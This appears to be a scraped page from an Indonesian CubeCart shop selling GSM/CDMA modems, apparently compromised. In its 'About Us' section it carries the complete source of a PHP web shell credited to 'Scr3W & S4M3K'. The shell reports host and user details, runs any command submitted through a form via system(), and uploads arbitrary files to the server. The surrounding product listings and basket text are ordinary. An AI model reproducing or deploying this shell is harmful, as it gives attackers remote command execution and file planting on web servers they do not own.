Search for:
Welcome Guest [Login | Register]
Shop by Category
Featured Product
Information
Products: 18
Categories: 3
Prices: Indonesian Rupiah
Support :
Sales1 :
Sales2 :
Sales3 :
Currency
Language
About Us
<head>
<title> .:: Scr3W & S4M3K WaS HeRe ::. </title>
<head>
<script language="JavaScript">
<!-- Begin
var months=new Array(13);
months[1]="Januari";
months[2]="Februari";
months[3]="Maret";
months[4]="April";
months[5]="Mei";
months[6]="Juni";
months[7]="Juli";
months[8]="Agustus";
months[9]="September";
months[10]="Oktober";
months[11]="November";
months[12]="Desember";
var time=new Date();
var lmonth=months[time.getMonth() + 1];
var date=time.getDate();
var year=time.getYear();
if (year < 2000)    // Y2K Fix, Isaac Powell
year = year + 1900;
document.write("<left><font color=#000000><b>" + date + " " + lmonth + " " + year + "</b>");
// End -->
</script>
</center>

<script language="JavaScript">
<!-- hiding
function showMilitaryTime() {
if (document.form.showMilitary[0].checked) {
return true;
}
return false;
}
function showTheHours(theHour) {
if (showMilitaryTime() || (theHour > 0 && theHour < 13)) {
if (theHour == "0") theHour = 12;
return (theHour);
}
if (theHour == 0) {
return (12);
}
return (theHour-12);
}
function showZeroFilled(inValue) {
if (inValue > 9) {
return "" + inValue;
}
return "0" + inValue;
}
function showAmPm() {
if (showMilitaryTime()) {
return ("");
}
if (now.getHours() < 12) {
return (" am");
}
return (" pm");
}
function showTheTime() {
now = new Date
document.form.showTime.value = showTheHours(now.getHours()) + ":" + showZeroFilled(now.getMinutes()) + ":" + showZeroFilled(now.getSeconds()) + showAmPm()
setTimeout("showTheTime()",1000)
}
// End -->
</script>
<body text="#000000" bgcolor="#F7F3C3" onLoad="showTheTime()" >
<div align="center"><img src="http://kecanduan-inter.net/baner.gif"></div>
<p align="center">&nbsp;
</p>

<p align="center"><font color="#000000" size="3" face="Times New Roman, Times, serif"><b>File Inject PHP Modified by Scr3W & S4M3K</b>&nbsp;</font>

<font face="courier new" size="2" color="777777"><hr color=777777 width=100% height=115px>
</font>
<font color="#000000"></font><font face="comic sans MS">
  </p>
</font></font>
<div align="left"><font color="#000000" face="comic sans MS"><b>
  <?php
  closelog( );
  $user = get_current_user( );
  $login = posix_getuid( );
  $euid = posix_geteuid( );
  $ver = phpversion( );
  $gid = posix_getgid( );
  if ($chdir == "") $chdir = getcwd( );
  if(!$whoami)$whoami=exec("whoami");
?>
  </b></font>
  <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
    <?php
  $uname = posix_uname( );
  while (list($info, $value) = each ($uname)) {
?>
    <TR>

      <TD align="left"><font color="#000000"><b>
        <?= $info ?>
      </b></font></TD>
      <TD align="left"><DIV STYLE=""><font color="#000000"><b>:</b>            <?= $value ?>
          </span></font></DIV></TD>
    </TR>
   
<?php
  }
?>
    <TR>

      <TD align="left"><font color="#000000"><b>User Info</b></font></TD>
      <TD align="left"><DIV STYLE=""><font color="#000000"><b>: uid=
          <?= $login ?>
        (
        <?= $whoami?>
        ) euid=
        <?= $euid ?>
        (
        <?= $whoami?>
        ) gid=
        <?=

$gid ?>

        (
        <?= $whoami?>
      )</span></b></font></DIV></TD>
    </TR>
   
  <TR>
    <TD align="left"><font color="#000000"><b>Current Path</b></font></TD>
      <TD align="left"><DIV STYLE=""><font color="#000000"><b>:       
          <?= $chdir ?>
          </span></b></font></DIV></TD>

    </TR>
    <TR>
      <TD align="left"><font color="#000000"><b>Permission Directory</b></font></TD>
      <TD align="left"><DIV STYLE=""><font color="#000000"><b>:       
          <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?>
   
          </span></b></font></DIV></TD>
    </TR> 
    <TR>
      <TD align="left"><font color="#000000"><b>Server Services</b></font></TD>

      <TD align="left"><DIV STYLE=""><font color="#000000"><b>:       
          <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>
          </span></b></font></DIV></TD>
    </TR>
    <TR>
      <TD align="left"><font color="#000000"><b>Server Address</b></font></TD>
   
  <TD align="left"><DIV STYLE=""><font color="#000000"><b>:       
          <?= "$SERVER_ADDR $SERVER_NAME"; ?>
        </span></b></font></DIV></TD>

    </TR>
    <TR>
      <TD align="left"><font color="#000000"><b>Script Current User</b></font></TD>
      <TD align="left"><DIV STYLE=""><font color="#000000"><b>:       
          <?= $user ?>
          </span></b></font></DIV></TD>
   
  </TR>
    <TR>
      <TD align="left"><font color="#000000"><b>PHP Version</b></font></TD>

      <TD align="left"><DIV STYLE=""><font color="#000000"><b>:       
          <?= $ver ?>
          </span></b></font></DIV></TD>
    </TR>
    </TABLE>
</div>
<font color="#000000">
</div>

<?php

set_magic_quotes_runtime(0);

$currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);

$UName  = `uname -a`;
$SCWD   = `pwd`;
$UserID = `id`;

if( $currentWD == "" ) {
    $currentWD = $SCWD;
}

if( $_POST['_act'] == "List files!" ) {
    $currentCMD = "ls -al";
}


print "<form method=post enctype=\"multipart/form-data\"><hr><hr><table>";

print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";

print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";

print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";

print "</table></form><hr><hr>";

$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);

if( $_POST['_act'] == "Upload!" ) {
    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
        print "<center><b>Error while uploading file!</b></center>";
    } else {
        print "<center><pre>";
        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
        print "</pre><b>File uploaded successfully!</b></center>";
    }   
} else {
    print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
    $currentCMD = "cd ".$currentWD.";".$currentCMD;
  system("$currentCMD 1> /tmp/.cmd 2>&1; cat /tmp/.cmd; rm
/tmp/.cmd");
    print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
}

exit;

?>

</font>
</body></font></font></b></font>
<hr color=777777 width=100% height=115px>
<p align="center">
<p>
<font face="Verdana" size="1">
<b>CopyLeFt @ 2008 Scr3W & S4M3K</b>
</font><font face="verdana" size="2"><br></font>
</p>
Shopping Basket
Your basket is empty.
0Items in cart:
Rp0.00Total:
Popular Products
Sale Items
  1. MODEM 8 Port
    Save Rp760,000.00
  2. Wavecom Fastrack M1206B(Q2406B)
    Save Rp522,500.00
  3. WAVECOM SUPREME
    Save Rp380,000.00
  4. Modem CDMA RS232
    Save Rp266,000.00
  5. Modem GPRS USB
    Save Rp237,500.00
  6. M1206B(Q2403A)
    Save Rp166,250.00
  7. Suntraveller GPRS-200 RS232 Modem
    Save Rp142,500.00
  8. Suntraveller CDMA-200 RS232 Modem
    Save Rp95,000.00
  9. Electronic Cash Register ER-290
    Save Rp95,000.00
  10. Maestro 100 IP
    Save Rp47,500.00
Mailing List
Subscribe to our mailing list below:
Email:

Powered by CubeCart
Copyright Devellion Limited 2006. All rights reserved.